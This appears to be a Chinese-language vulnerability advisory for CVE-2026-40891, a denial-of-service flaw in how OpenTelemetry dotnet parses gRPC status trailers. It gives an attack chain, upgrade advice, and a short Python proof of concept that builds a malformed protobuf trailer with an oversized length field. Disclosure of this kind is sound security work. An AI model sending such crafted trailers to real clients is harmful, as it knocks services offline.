CVE-2026-40891 CVSS 5.3 中危

CVE-2026-40891 OpenTelemetry dotnet 拒绝服务漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40891

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenTelemetry dotnet

漏洞概述

OpenTelemetry dotnet 1.13.1至1.15.2之前版本存在拒绝服务漏洞。在使用OTLP通过gRPC导出遥测数据时，解析服务器提供的grpc-status-details-bin trailer存在问题。攻击者可发送格式错误的trailer，诱导应用分配过量内存，导致服务不可用。

技术细节

OpenTelemetry dotnet在通过gRPC重试处理OTLP导出数据时，会解析服务器返回的grpc-status-details-bin trailer。由于解析器未对protobuf消息中的长度限定字段进行充分校验，直接将其用于内存分配。攻击者可构造包含超大长度值的恶意trailer。当客户端解析该数据时，会尝试分配巨大的内存块，导致系统资源耗尽，从而引发拒绝服务。

攻击链分析

STEP 1

1. 网络定位

攻击者需处于受影响OpenTelemetry dotnet客户端的邻接网络（AV:A）。

STEP 2

2. 恶意响应构造

攻击者作为gRPC服务器或中间人，构造包含grpc-status-details-bin trailer的响应，其中包含超大长度的protobuf字段。

STEP 3

3. 触发解析

受影响的客户端在重试或处理响应时，解析该trailer。

STEP 4

4. 内存分配

解析器读取恶意长度值，并尝试分配对应大小的内存块。

STEP 5

5. 拒绝服务

由于内存分配请求过大，导致应用程序崩溃或系统资源耗尽，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual PoC for generating malicious gRPC trailer
import struct

# Simulate crafting a malformed protobuf message for grpc-status-details-bin
# The vulnerability is the 'length' field being extremely large.
# Protobuf format: [Field Number << 3 | Wire Type] [Length] [Data]

field_number = 1
wire_type = 2  # Length-delimited
tag = (field_number << 3) | wire_type

# Malicious length: e.g., 2GB (0x80000000)
malicious_length = 0x80000000  

# Encode tag and length as varint (simplified)
def encode_varint(n):
    data = b''
    while n > 0x7F:
        data += bytes([(n & 0x7F) | 0x80])
        n >>= 7
    data += bytes([n])
    return data

trailer_payload = encode_varint(tag) + encode_varint(malicious_length)
# The actual data would be missing or truncated, causing allocation attempt.
print(f"Malicious Trailer Payload (Hex): {trailer_payload.hex()}")

影响范围

OpenTelemetry dotnet >= 1.13.1, < 1.15.2

防御指南

临时缓解措施

建议用户尽快升级到修复版本1.15.2。若暂时无法升级，应限制gRPC服务器的访问来源，确保仅信任的内部服务器可以与OpenTelemetry Collector通信，避免接收不可信的trailer数据。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表